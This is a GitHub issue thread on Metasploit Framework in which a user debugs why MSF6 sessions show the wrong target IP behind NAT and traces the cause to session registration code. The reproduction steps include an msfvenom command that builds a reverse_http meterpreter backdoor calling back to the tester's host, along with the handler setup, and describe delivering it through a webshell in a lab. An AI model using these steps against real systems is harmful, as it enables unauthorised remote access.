Session is not displaying target IP’s address when using MSF6, for MSF5 it did #16684

Closed
jmbuk opened this issue Jun 17, 2022 · 8 comments · Fixed by #17036


jmbuk commented Jun 17, 2022

Steps to reproduce

In my lab environment, a target machine is behind a firewall, the outbound gateway for the target environment is 100.64.1.254, and the target IP is 172.16.99.5. The KALI host IP is 100.64.1.200.

When using MSF5 (Framework: 5.0.63-dev Console : 5.0.63-dev) a session is created from the target, using a backdoor created with msfvenom, the session correctly indicates the source and destination IPs and the target HOST real IP. (see image)

image

However when doing the exact same steps with MSF6 (note: a new backdoor is created with MSF6's msfvenom), the GW/FW IP is wrong and the target IP is missing (see screenshot).

image

Also, if I change the backdoor and the handler to use windows/x64/meterpreter/reverse_tcp instead of reverse_http, the GW/FW IP is correctly populated, but the target IP is still wrong. It is no longer missing, but instead of being 172.16.99.5 it is 100.65.1.254, which is the GW/FW IP. It should be 172.16.99.5. (See screenshot.)

image

To see the issue, create a backdoor (one for each framework version) using msfvenom:

  1. msfvenom -p windows/x64/meterpreter/reverse_http lhost=100.64.1.200 lport=8080 -f exe -b \x00\xff -o backdoor.exe
  2. Start msfconsole and use exploit/multihandler with set payload windows/x64/meterpreter/reverse_http and set LPORT 8080
  3. Upload backdoor to a target host behind a firewall, in my case I use a webshell to upload to a compromised IIS server and the backdoor runs under an IUSR account.
  4. Once the session is created, from the msfconsole run sessions -x. You will see that when using MSF6 the target IP is missing, whereas when using MSF5 it was populated.


Were you following a specific guide/tutorial or reading documentation?

No.

Expected behavior

The Target IP should correctly populate with the IP of the target machine. The GW/FW IP should also not be the local loopback, but the actual IP of the incoming connection.

Current behavior

With MSF5 everything works as it should, with MSF6 the target IP is either not populated, or populated incorrectly depending on what payload is used. Also the incoming IP address of the connection is wrong when using the reverse_http handler, but it is correct when using the reverse_tcp handler.

Metasploit version

Framework: 6.2.2-dev
Console : 6.2.2-dev

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/multi/handler

[multi/handler]
PAYLOAD=windows/x64/meterpreter/reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=false
ListenerTimeout=0
LPORT=8081
LHOST=0.0.0.0
Target=0

Database Configuration

The database contains the following information:

Session Type: Connected to msf. Connection type: postgresql.
ID Hosts Vulnerabilities Notes Services
1 (Current) 10 2 19 0
Total (1) 10 2 19 0

History

The following commands were ran during the session and before this issue occurred:

47     set loglevel 3
48     resource /home/kali/.msf4/bdwin64HTTP8080.rc
49     resource /home/kali/.msf4/bdwin64TCP8081.rc
50     seesions -x
51     sessions -x
52     debug

Framework Errors

The following framework errors occurred before the issue occurred:

[06/17/2022 06:31:55] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[06/17/2022 06:31:55] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[06/17/2022 06:31:56] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[06/17/2022 06:31:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">

Web Service Errors

The following web service errors occurred before the issue occurred:

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

[06/17/2022 06:00:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:00:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:00:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:00:58] [w(0)] core: The following modules could not be loaded!
[06/17/2022 06:00:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[06/17/2022 06:00:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[06/17/2022 06:00:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[06/17/2022 06:00:58] [d(0)] core: HistoryManager.push_context name: :msfconsole
[06/17/2022 06:03:25] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[06/17/2022 06:03:25] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[06/17/2022 06:03:27] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:03:27] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[06/17/2022 06:03:28] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:10:06] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (2)
[06/17/2022 06:10:06] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (2)
[06/17/2022 06:29:44] [w(0)] core: Session 2 has died
[06/17/2022 06:31:30] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:31:36] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[06/17/2022 06:31:55] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[06/17/2022 06:31:55] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[06/17/2022 06:31:56] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[06/17/2022 06:31:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:31:58] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[06/17/2022 06:31:58] [w(0)] core: The following modules could not be loaded!
[06/17/2022 06:31:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[06/17/2022 06:31:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[06/17/2022 06:31:58] [w(0)] core:      /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[06/17/2022 06:31:58] [d(0)] core: HistoryManager.push_context name: :msfconsole
[06/17/2022 06:32:37] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[06/17/2022 06:32:37] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_http with multi/handler]: reverse to tunnel
[06/17/2022 06:32:37] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_http with multi/handler]: bind to tunnel
[06/17/2022 06:32:37] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_http with multi/handler]: noconn to tunnel
[06/17/2022 06:32:37] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_http with multi/handler]: none to tunnel
[06/17/2022 06:32:37] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_http with multi/handler]: tunnel to tunnel
[06/17/2022 06:32:37] [d(1)] core: Module windows/x64/meterpreter/reverse_http is compatible with multi/handler
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () >
[06/17/2022 06:33:24] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:33:24] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[06/17/2022 06:33:24] [e(0)] core: Session with no session_host/target_host/tunnel_peer. Session Info: #<Session:meterpreter 127.0.0.1 () "NT AUTHORITY\IUSR @ SRV-DMZ-WS-A1">
[06/17/2022 06:34:00] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: reverse to reverse
[06/17/2022 06:34:00] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: bind to reverse
[06/17/2022 06:34:00] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: noconn to reverse
[06/17/2022 06:34:00] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: none to reverse
[06/17/2022 06:34:00] [d(3)] core: Checking compat [windows/x64/meterpreter/reverse_tcp with multi/handler]: tunnel to reverse
[06/17/2022 06:34:00] [d(1)] core: Module windows/x64/meterpreter/reverse_tcp is compatible with multi/handler
[06/17/2022 06:34:39] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (2)
[06/17/2022 06:34:40] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (2)

Web Service Logs

The following web service logs were recorded before the issue occurred:

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Framework: 6.2.2-dev
Ruby: ruby 3.0.3p157 (2021-11-24 revision 3fb7d2cadc) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Other - Please specify
@jmbuk jmbuk added the bug label Jun 17, 2022

jmbuk commented Jun 27, 2022

This appears to be the same problem as reported in #15048 (Sessions don't show correct victim IP addresses when using http and https payloads). Unfortunately, there wasn't a solution provided.
Also, if I do a db_disconnect and then rerun the backdoor, the target IP is populated correctly. Maybe the problem is to do with reading the sessions -x info from the db?


jmbuk commented Jun 29, 2022

Doing a little digging in the RB file /usr/share/metasploit/lib/msf/base/session/meterpreter.rb: if the database was disconnected (db_disconnect), the correct value of the NATed target was being displayed, so self.session_host was being correctly set to nhost (which is 172.16.99.5 in my case).

This code was being correctly executed:

```ruby
if nhost && !(framework.db && framework.db.active)
  self.session_host = nhost
end
```

However, when the db was connected, self.session_host was not being set to nhost. After a little debugging (unfortunately I am not a developer, and especially not a Ruby developer), it looked like "self.db_record" was not defined. So the if statement on line 488, "if nhost and self.db_record", was not being entered (I put a print_status line in there, which wasn't being executed) and hence the nhost value was not being correctly applied to self.session_host.

This worked in MSF5, so I started comparing RB files between MSF5 and MSF6, and after some time doing file compares I came across lib/msf/core/session_manager.rb.
In MSF5, for def register(session) there was a section of code that is not in the current MSF6 version of the file. The section of code was:

```ruby
# Notify the framework that we have a new session opening up...
# Don't let errant event handlers kill our session
begin
  framework.events.on_session_open(session)
rescue ::Exception => e
  wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
  wlog("Call Stack\n#{e.backtrace.join("\n")}")
end
```

After adding it to the MSF6 version:

```ruby
def register(session)
  if (session.sid)
    wlog("registered session passed to register again (sid #{session.sid}).")
    return nil
  end

  next_sid = allocate_sid

  # Initialize the session's sid and framework instance pointer
  session.sid       = next_sid
  session.framework = framework

  # Only register if the session allows for it
  if session.register?
    # Insert the session into the session hash table
    self[next_sid.to_i] = session

    # ***** ADDED THIS FROM MSF5 VERSION OF FILE *****
    # Notify the framework that we have a new session opening up...
    # Don't let errant event handlers kill our session
    begin
      framework.events.on_session_open(session)
    rescue ::Exception => e
      wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
      wlog("Call Stack\n#{e.backtrace.join("\n")}")
    end
    # ***** ADDED ABOVE THIS FROM MSF5 VERSION OF FILE *****

    if session.respond_to?("console")
      session.console.on_command_proc = Proc.new { |command, error| framework.events.on_session_command(session, command) }
      session.console.on_print_proc = Proc.new { |output| framework.events.on_session_output(session, output) }
    end
    if session.respond_to?("on_registered")
      session.on_registered
    end
  end
end
```

After I did this, all worked as it had when using MSF5.

As mentioned, I am not a developer, but hopefully when one is able to look at this they can figure out why this works and the consequences of adding it?

@adfoster-r7 (Contributor) commented

@jmbuk Thanks for taking a look 👍

It'd be great if you threw up a PR with your fix and replication steps - and we could see about getting your fix merged in, or we could spot if there's any code changes to make


jmbuk commented Jul 5, 2022

Hello @adfoster-r7 ,
I am not sure how to throw up a PR (are there instructions anywhere you can point me to?). Also I don't think my fix can be used as-is (albeit it does work fine).
I think in MSF6 they replaced (in lib/msf/core/session_manager.rb):

```ruby
begin
  framework.events.on_session_open(session)
rescue ::Exception => e
  wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
  wlog("Call Stack\n#{e.backtrace.join("\n")}")
end
```

With

```ruby
if session.respond_to?("on_registered")
  session.on_registered
end
```

I believe both "framework.events.on_session_open(session)" and " session.on_registered" are meant to register the session, as I see that the session is registered twice (since adding the code back from MSF5) (however that hasn't caused a problem in my environment):

image

I think the question is, when using the new code, session.on_registered, why isn't self.db_record being populated?

However to answer your question the steps to replicate 'my fix' are to add back the following lines of code to lib/msf/core/session_manager.rb

```ruby
begin
  framework.events.on_session_open(session)
rescue ::Exception => e
  wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
  wlog("Call Stack\n#{e.backtrace.join("\n")}")
end
```

after the following code:

```ruby
def register(session)
  if (session.sid)
    wlog("registered session passed to register again (sid #{session.sid}).")
    return nil
  end

  next_sid = allocate_sid

  # Initialize the session's sid and framework instance pointer
  session.sid       = next_sid
  session.framework = framework

  # Only register if the session allows for it
  if session.register?
    # Insert the session into the session hash table
    self[next_sid.to_i] = session

    # CODE FROM MSF5 session_manager.rb
    begin
      framework.events.on_session_open(session)
    rescue ::Exception => e
      wlog("Exception in on_session_open event handler: #{e.class}: #{e}")
      wlog("Call Stack\n#{e.backtrace.join("\n")}")
    end
    # ......
```
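
To make the ordering dependency described in this comment and the Jun 29 one concrete, here is a small Ruby model added as an example; it is not Metasploit's code. FakeDb, Session, SessionManager and displayed_host are assumed names, and the idea that a DB event handler run from on_session_open is what creates a session's db_record is taken from the reporter's description, not from the framework source.

```ruby
# Toy model (added example, not Metasploit's code) of the registration
# ordering discussed in this issue. All class/method names are assumptions.
class FakeDb
  attr_reader :active

  def initialize(active)
    @active = active
    @records = {}
  end

  # Assumed DB event handler: creates the record that later host updates go through.
  def on_session_open(session)
    @records[session.sid] = { sid: session.sid, host: session.session_host }
    session.db_record = @records[session.sid]
  end
end

class Session
  attr_accessor :sid, :session_host, :db_record
  attr_reader :nhost

  def initialize(tunnel_peer, nhost)
    @nhost = nhost                # address the payload reports for itself
    @session_host = tunnel_peer   # address seen on the listener (the GW/FW)
  end

  # Mirrors the two branches quoted above: with the DB inactive nhost wins
  # outright; with the DB active it is only applied once a db_record exists.
  def apply_nhost(db)
    if nhost && !(db && db.active)
      self.session_host = nhost
    elsif nhost && db_record
      self.session_host = nhost
      db_record[:host] = nhost
    end
  end
end

class SessionManager
  def initialize(db, fire_session_open:)
    @db = db
    @fire_session_open = fire_session_open
    @next_sid = 0
  end

  def register(session)
    session.sid = (@next_sid += 1)
    # The MSF5 step the reporter added back: fire the open event first.
    @db.on_session_open(session) if @fire_session_open
    # The on_registered step, modelled here as the nhost fix-up.
    session.apply_nhost(@db)
    session
  end
end

# Host the console would show for one registration variant. Addresses are
# constructed from the report: GW/FW 100.64.1.254, real target 172.16.99.5.
def displayed_host(db_active:, fire_session_open:)
  s = Session.new('100.64.1.254', '172.16.99.5')
  mgr = SessionManager.new(FakeDb.new(db_active), fire_session_open: fire_session_open)
  mgr.register(s).session_host
end
```

With the DB connected and no open event fired, displayed_host returns the GW/FW address, which is the symptom reported here; firing the event first (or disconnecting the DB) yields the real target address.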

@adfoster-r7 (Contributor) commented

Thanks for digging into this 👍

I'm not sure when we'd have the cycles to patch this up correctly and ensure that there's no edge cases involved in fixing this issue. Let me know if you think this would be a high priority bug that should be fixed and I'll see if it can get fixed sooner rather than later 👍


jmbuk commented Jul 11, 2022

If I didn't have the work around, I would say it is high priority. However I have noticed other bugs entered, for example #15048, which have the same root cause. This will only happen when metasploit is behind a device doing NATing.

@github-actions commented

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Aug 10, 2022
@adfoster-r7 adfoster-r7 removed the Stale Marks an issue as stale, to be closed if no action is taken label Aug 10, 2022
@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Sep 12, 2022
@adfoster-r7 adfoster-r7 removed the Stale Marks an issue as stale, to be closed if no action is taken label Sep 12, 2022
@smcintyre-r7 smcintyre-r7 self-assigned this Sep 15, 2022
zeroSteiner added a commit to zeroSteiner/metasploit-framework that referenced this issue Sep 19, 2022
This will fail though if #rstream has already been closed which can be
the case when the socket is serving an HTTP request. This attempts to
proactively cache the information and store it for later use.
@smcintyre-r7 smcintyre-r7 linked a pull request Sep 19, 2022 that will close this issue